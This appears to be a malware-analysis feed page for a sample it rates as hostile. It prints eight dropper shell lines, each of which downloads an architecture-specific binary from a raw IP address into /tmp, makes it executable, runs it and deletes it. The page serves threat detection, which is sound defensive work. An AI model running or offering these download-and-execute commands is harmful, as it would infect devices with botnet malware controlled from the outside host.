Hostile 100% Download

6141287a6f2019bd70f49460e6e353e2a66c680cef0a30cee46ca05c5d8bf402.unknown

Downloads and executes remote binaries

Raw-IP wget world-writable fetch executeRepeated raw-IP payload download chmod execution
SHA-2566141287a6f2019bd70f49460e6e353e2a66c680cef0a30cee46ca05c5d8bf402

Evidence

Curl/wget command targets an IPv4 URL lines 1–8
1cd /tmp; rm -rf mips; wget http://42.112.26.36/mips; chmod 777 mips; ./mips a; rm -rf mips;
2cd /tmp; rm -rf mpsl; wget http://42.112.26.36/mpsl; chmod 777 mpsl; ./mpsl a; rm -rf mpsl;
3cd /tmp; rm -rf arm; wget http://42.112.26.36/arm; chmod 777 arm; ./arm a; rm -rf arm;
4cd /tmp; rm -rf arm5; wget http://42.112.26.36/arm5; chmod 777 arm5; ./arm5 a; rm -rf arm5;
5cd /tmp; rm -rf arm6; wget http://42.112.26.36/arm6; chmod 777 arm6; ./arm6 a; rm -rf arm6;
6cd /tmp; rm -rf arm7; wget http://42.112.26.36/arm7; chmod 777 arm7; ./arm7 a; rm -rf arm7;
7cd /tmp; rm -rf sh4; wget http://42.112.26.36/sh4; chmod 777 sh4; ./sh4 a; rm -rf sh4;
8cd /tmp; rm -rf ppc; wget http://42.112.26.36/ppc; chmod 777 ppc; ./ppc a; rm -rf ppc;

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.